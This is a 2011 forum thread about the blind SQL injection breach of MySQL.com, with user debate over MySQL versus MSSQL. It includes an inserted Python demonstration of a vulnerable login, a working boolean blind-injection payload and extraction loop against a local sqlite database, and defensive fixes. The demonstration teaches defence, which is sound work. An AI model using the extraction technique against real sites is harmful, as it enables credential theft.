
MySQL.com taken out - with SQL injection attack

Posted: 28 Mar 2011, 05:50
by Ron2K
An email was sent out earlier today on the Full-Disclosure mailing list, detailing the compromise of numerous MySQL websites along with portions of their database containing usernames and passwords.

MySQL offers database software and services for businesses at an enterprise level as well as services for online retailers, web forums and even governments. The vulnerability behind the attack, which was carried out using blind SQL injection and targeted servers including MySQL.com, MySQL.fr, MySQL.de and MySQL.it, was initially found by "TinKode" and "Ne0h" of Slacker.Ro (according to their pastebin.com/BayvYdcP dump of the stolen credentials) but published by "Jackh4x0r".

The stolen database contains both member and employee email addresses and credentials, as well as tables with customer and partner information and internal network details. Hashes from the database have been posted, some of which have already been cracked.
Source

Ouch...

Re: MySQL.com taken out - with SQL injection attack

Posted: 28 Mar 2011, 05:58
by Tribble
Wow - we use MySQL for many of our music and spot databases. Thanks for the heads up

Re: MySQL.com taken out - with SQL injection attack

Posted: 28 Mar 2011, 06:39
by -Prometheus-

Re: MySQL.com taken out - with SQL injection attack

Posted: 28 Mar 2011, 08:41
by Tribble
I am going to check nonetheless.

Re: MySQL.com taken out - with SQL injection attack

Posted: 28 Mar 2011, 08:56
by hamin_aus
MySQfaiL

You get what you pay for.

Re: MySQL.com taken out - with SQL injection attack

Posted: 28 Mar 2011, 09:43
by rustypup
q: how often do the package devs get involved in the web interface?
a: less than 0.00002% of the time..

bad web dev != bad MySQL... just saying... lousy internet presence should hardly be equated to vulnerabilities in the product... MySQL has plenty of flaws, but this "hack" is a flaw shared by every SQL engine out there....

Re: MySQL.com taken out - with SQL injection attack

Posted: 28 Mar 2011, 10:04
by hamin_aus
rustypup wrote:MySQL has plenty of flaws
Oh, the thesis I could write in reply to this statement :lol:

Re: MySQL.com taken out - with SQL injection attack

Posted: 28 Mar 2011, 13:24
by senile
jamin_za wrote:
rustypup wrote:MySQL has plenty of flaws
Oh, the thesis I could write in reply to this statement :lol:
We're here now, you might as well entertain us: MySQL vs MSSQL in this regard?

Re: MySQL.com taken out - with SQL injection attack

Posted: 28 Mar 2011, 13:35
by RuadRauFlessa
@Senile: A user on MSSQL with the correct rights can grant permissions and create users the same as can be done in MySQL......
The flaw is that the user used for accessing the database from a web front end should under no condition have the required access to perform such operations. It is an implementation flaw rather than a SQL design flaw. You can have the most secure system in the world but if it is not used correctly it will be as secure as a piece of swiss cheese....


Oh my.... the CHEESE.... :P

Re: MySQL.com taken out - with SQL injection attack

Posted: 28 Mar 2011, 14:09
by hamin_aus
senile wrote:MySQL vs MSSQL
Rant inbound...

MySQL does not do replication well, it does not do recovery well, it cannot do transactional processing with any degree of reliability, its user interface would have been tiresome 20 years ago, it does not adhere to SQL norms and syntax in a lot of fundamentally silly ways and even the simplest of configuration and troubleshooting steps are a chore.
What it does do well is cost nothing and run simple queries fast. It is good for serving webpages or hosting dumb data stores.
It is over-hyped by fanboi developers and up until version 5 and InnoDB I would have flat out refused to even look at it as a database option.

I am completely amazed by people's attempts to build complex applications around it. Just because it is free and every half-arsed developer and his fleshlight can install one and begin writing software for it does not mean you should. I have watched some truly laughable attempts to integrate it into Windows environments, I have seen some very creative ways people have tried to get it to aggregate data - just because it makes a neat data warehouse, does not mean it can also process that raw data into something usable...

Facebook has a MySQL farm. That should tell you everything you need to know.

I'm not going to extol the virtues of MSSQL - just read all the faults I listed about MySQL and know MSSQL does it better.
It's not perfect, it has its drawbacks, it needs more money, bigger hardware and you will probably pay your devs and admins more to look after it, but it's not for nickel-and-dime operators.
RuadRauFlessa wrote:A user on MSSQL with the correct rights can grant permissions and create users the same as can be done in MySQL
wat?

Re: MySQL.com taken out - with SQL injection attack

Posted: 28 Mar 2011, 22:26
by -Prometheus-

Re: MySQL.com taken out - with SQL injection attack

Posted: 29 Mar 2011, 02:45
by hamin_aus
I was asked to comment on MySQL vs MSSQL - you must have missed that part because your reply is telling me not to compare them...
-Prometheus- wrote:I'll bet if you compare MSSQL you will find flaws there that are not in MySQL.
Find me some.
-Prometheus- wrote:The same way I would entrust my life to the best opensource app, Truecrypt, but I won't touch MS' proprietary Shytelocker carp.
http://esec-lab.sogeti.com/dotclear/ind ... pt-english
-Prometheus- wrote:MySQL does a near perfect job for what it was intended to do.
I already said it did.
-Prometheus- wrote:So much actually that even large organisations are using it with great success for what it wasn't intended for.
Which large corporations, and what are they using it for :?:
-Prometheus- wrote:using bookface as an example, come on man!!!
Why not? Facebook is a perfect example of a basic and fairly dumb database. One person puts stuff in and then thousands read from it. There is virtually no data transformation. Once it is in there, it's in there.
-Prometheus- wrote:Don't blame the developer's mistake on the software used.
In this case the developers who allowed the vulnerability also wrote the backend that was exploited. Who should I blame here?
-Prometheus- wrote:I will continue to use it and not pay extra for a windows webhost with no benefit.
You still don't get my argument. Using it as a webhost is fine. That is what it was built to do.
Use it for something complex and see how far you get.

Re: MySQL.com taken out - with SQL injection attack

Posted: 29 Mar 2011, 04:44
by -Prometheus-

Re: MySQL.com taken out - with SQL injection attack

Posted: 29 Mar 2011, 05:15
by hamin_aus
-Prometheus- wrote:
jamin_za wrote:
-Prometheus- wrote:I'll bet if you compare MSSQL you will find flaws there that are not in MySQL.
Find me some.
Since I haven't really used it..
For the record, I have supported both databases, so I know their relative strengths and weaknesses.
At the end of the day, if you want simple stuff done really fast, use MySQL
If you want a full featured, robust DBMS for both transactional and analytical application use MSSQL (or Oracle, or DB2, or ADABAS - but that's a different argument)

Re: MySQL.com taken out - with SQL injection attack

Posted: 29 Mar 2011, 05:38
by -Prometheus-

Re: MySQL.com taken out - with SQL injection attack

Posted: 29 Mar 2011, 06:30
by RuadRauFlessa
jamin_za wrote:For the record, I have supported both databases, so I know their relative strengths and weaknesses.
At the end of the day, if you want simple stuff done really fast, use MySQL
If you want a full featured, robust DBMS for both transactional and analytical application use MSSQL (or Oracle, or DB2, or ADABAS - but that's a different argument)
Wow this is probably the first time ever I have to agree with hamin.... scary...

Seriously people... The particular exploit is not a flaw of a DBMS but rather a combination of bad administration and coding. If the coders who did the website (And for the record I can guarantee you that it isn't the same bloke who wrote the MySQL DBMS) had half a brain they would guard against SQL Injection. If their DBA had half a brain he would not allow them to connect to the DBMS with a user who has administrative rights.
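The two points the thread keeps circling back to, blind SQL injection in the web front end (the opening post) and the front end's database account holding far more rights than it needs (RuadRauFlessa's posts), can be shown together in one runnable script. This is an added example, not code from the thread or from MySQL.com; it uses Python's sqlite3 so it runs offline, with sqlite's authorizer standing in for a MySQL GRANT, and all table names, hashes and the `login` helper are constructed for illustration.

```python
import sqlite3

# Constructed sample data: one web-facing table and one internal table the
# web front end has no business reading. Hashes are illustrative hex strings.
MEMBERS = [("alice", "5f4dcc3b5aa765d61d8327deb882cf99"),
           ("bob", "e10adc3949ba59abbe56e057f20f883e")]
EMPLOYEES = [("dba@example.test", "25d55ad283aa400af464c76d713c07ad")]
HEX = "0123456789abcdef"


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE members (username TEXT, pw_hash TEXT);"
        "CREATE TABLE employees (email TEXT, pw_hash TEXT);"
    )
    conn.executemany("INSERT INTO members VALUES (?, ?)", MEMBERS)
    conn.executemany("INSERT INTO employees VALUES (?, ?)", EMPLOYEES)
    conn.commit()
    return conn


def vulnerable_login(conn, username, pw_hash):
    """The classic mistake: user input pasted straight into the SQL text."""
    sql = ("SELECT 1 FROM members WHERE username = '%s' AND pw_hash = '%s'"
           % (username, pw_hash))
    return conn.execute(sql).fetchone() is not None


def safe_login(conn, username, pw_hash):
    """Same check with bound parameters: input can never alter query structure."""
    sql = "SELECT 1 FROM members WHERE username = ? AND pw_hash = ?"
    return conn.execute(sql, (username, pw_hash)).fetchone() is not None


def blind_extract(login, subquery, alphabet=HEX, max_len=64):
    """Boolean-based blind extraction: the only signal is login yes/no.
    `login(username)` must return True when the injected condition holds."""
    out = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            payload = "x' OR substr((%s), %d, 1) = '%s' -- " % (subquery, pos, ch)
            if login(payload):
                out += ch
                break
        else:  # no character matched: we ran past the end of the value
            break
    return out


def apply_least_privilege(conn):
    """Stand-in for a MySQL GRANT: the web account may only SELECT from members.
    sqlite's authorizer vetoes any other table, statement type or transaction."""
    def policy(action, arg1, arg2, db_name, trigger):
        if action in (sqlite3.SQLITE_SELECT, sqlite3.SQLITE_FUNCTION):
            return sqlite3.SQLITE_OK
        if action == sqlite3.SQLITE_READ and arg1 == "members":
            return sqlite3.SQLITE_OK
        return sqlite3.SQLITE_DENY
    conn.set_authorizer(policy)


def demo():
    target = "SELECT pw_hash FROM employees LIMIT 1"
    results = {}
    conn = build_db()
    # 1. Vulnerable query + over-privileged account: the whole hash leaks,
    #    one character per confirmed guess, without any error message.
    results["vulnerable"] = blind_extract(
        lambda u: vulnerable_login(conn, u, "irrelevant"), target)
    # 2. Parameterised query: the payload is just a username that does not exist.
    results["parameterized"] = blind_extract(
        lambda u: safe_login(conn, u, "irrelevant"), target)
    # 3. Still vulnerable code, but a least-privileged account: the injection
    #    happens, yet the cross-table read is refused by the database itself.
    apply_least_privilege(conn)
    try:
        blind_extract(lambda u: vulnerable_login(conn, u, "irrelevant"), target)
        results["least_privilege"] = "leaked"
    except sqlite3.DatabaseError as exc:
        results["least_privilege"] = "denied: %s" % exc
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print("%-16s %s" % (name, value))
```

Case 3 is the one the thread argues about: fixing the code (case 2) is the real fix, but a correctly scoped database account limits what a missed injection can reach, which is exactly the difference between leaking one table and leaking employee credentials and internal network details.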

Re: MySQL.com taken out - with SQL injection attack

Posted: 01 Apr 2011, 10:56
by JollyJamma
Jamin Vs. religion and -Prometheus-
Jamin Vs. MySql and -Prometheus-

Why you argue so much?

Re: MySQL.com taken out - with SQL injection attack

Posted: 01 Apr 2011, 11:13
by hamin_aus

Re: MySQL.com taken out - with SQL injection attack

Posted: 01 Apr 2011, 12:24
by JollyJamma
egzackery